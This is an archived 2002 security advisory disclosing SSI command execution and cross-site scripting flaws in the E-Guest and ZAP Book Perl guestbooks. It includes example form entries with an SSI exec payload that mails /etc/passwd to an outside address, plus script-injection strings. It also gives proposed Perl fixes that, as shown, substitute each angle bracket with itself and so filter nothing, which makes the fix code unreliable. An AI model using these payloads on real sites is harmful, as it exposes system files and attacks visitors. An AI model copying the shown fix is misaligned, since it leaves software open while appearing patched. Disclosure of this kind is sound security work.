('binary' encoding is not supported, stored as-is) [ DownBload Security Research Lab Advisory ] [-------------------------------------------------------------------------] Advisory name: SSI & CSS execution in E-Guest (1.1) & ZAP Book (v1.0.3) Advisory number: 6 Application: E-Guest (1.1) & ZAP Book (v1.0.3) (CGI scripts) ---[ E-Guest Author: Leung Eric E-mail: cgiat_private Homepage: http://leungeric.com Working demo: http://leungeric.com/eric/demo/E-Guest_sign.pl ---[ ZAP Book Author: Sephiroth32 E-mail: sephiroth32at_private Homepage: http://www.unitedff.com Date: 28.06.2002 Impact: remote user can execute shell commands & cross site scripting Tested on: Debian 2.1 (2.0.36 kernel), Apache web server - version 1.3.4 Discovered by: DownBload Mail me @: downbloadat_private ======[ Overview --[ E-Guest is "...full feature guestbook written in Perl...". Maybe little too much 'full feature' ;). --[ ZAP Book is guestbook too, but it is more advanced than E-Guest. ======[ Problem It looks that it is very hard to find secure guestbook. ;). --[ E-Guest author wrote - "HTML tag filtering". That is true, but only 'comment' is filtered, and there is still name, email, homepage and location, where we can put our nasty SSI or CSS code. --[ ZAP Book is different animal. In ZAP Book, almost everything is filtered. Exception is 'post' variable, which contains user comment, so again, we can put our nasty SSI or CSS code in 'post' variable. ======[ Examples ---[ E-Guest SSI attack ~~~~~~~~~~ Full Name: HI<!--#exec cmd="/bin/mail downbloadat_private < /etc/passwd"- -> E-mail: downbloadat_private Homepage: UIN: Location: Beyond the light Comment: Nothing special, just SSI attack. CSS attack ~~~~~~~~~~ Full Name: HI<script>javascript:alert('HACKED BY DOWNBLOAD');</script> E-mail: downbloadat_private Homepage: UIN: Location: Beyond the light Comment: Nothing special, just CSS attack. ---[ ZAP Book SSI attack ~~~~~~~~~~ Name: DownBload Email: downbloadat_private Homepage: Location: AIM Screename: MSN Email: Yahoo! Screename: ICQ Number: Referred by: Search Engine Entry: SSI attack <!--#exec cmd="/bin/mail downbloadat_private < /etc/passwd"--> CSS attack ~~~~~~~~~~ Name: DownBload Email: downbloadat_private Homepage: Location: AIM Screename: MSN Email: Yahoo! Screename: ICQ Number: Referred by: Search Engine Entry: CSS attack <script>javascript:alert('HACKED BY DOWNBLOAD');</script> ======[ Solution As i said in 'Makebook advisory', solution for SSI & CSS attack is filtering special characters from user input. ---[ E-Guest FIX: Add next code to E-Guest_sign.pl (or wait for fixed version :-): ... $fullname =~ s/</</g; $fullname =~ s/>/>/g; $email =~ s/</</g; $email =~ s/>/>/g; $homepage =~ s/</</g; $homepage =~ s/>/>/g; $uin =~ s/</</g; $uin =~ s/>/>/g; $location =~ s/</</g; $location =~ s/>/>/g; ... ---[ ZAP Book FIX: Add next code to addentry.cgi (or wait for fixed version :-): ... $in{'post'} =~ s/</</g; $in{'post'} =~ s/>/>/g; ... ======[ Greetz Greetz goes to #hr.hackers <irc.carnet.hr>. Special greetz goes to (rand()): St0rm, BoyScout, h4z4rd, fi, Sunnis, Fr1c, harlequin, Astral and www.active-security.org. Special shitz goes to: DarkMan from crohack a.k.a darkforum, and his stupid friend h4x0r.
This archive was generated by hypermail 2b30 : Sat Jun 29 2002 - 09:30:36 PDT